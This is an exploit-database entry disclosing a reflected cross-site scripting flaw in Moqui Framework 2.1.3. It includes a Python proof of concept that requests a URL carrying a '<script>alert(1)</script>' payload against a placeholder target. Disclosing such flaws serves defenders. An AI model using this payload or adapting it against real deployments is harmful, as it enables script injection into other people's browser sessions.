Moqui Framework 2.1.3 - Reflected Cross Site Scripting

2022.07.24
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Author: Maximus Decimus or maximus0xday@gmail.com # Software Link: https://github.com/moqui/moqui-framework/ # Vendor Homepage: https://www.moqui.org/ # Tested on: Windows 10 ===================================== # Description : This framework is vulnerable to xss attack due to the lack of proper input filtering # for more information , check out this page : https://www.moqui.org/docs ===================================== # POC : # Set the target url and run the following python script import requests url_string = "https://target.com:443/;<script>alert(1)</script>test1337" request_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en-US;q=0.9,en;q=0.8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36", "Connection": "close", "Cache-Control": "max-age=0"} requests.get(url_string, headers=request_headers)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top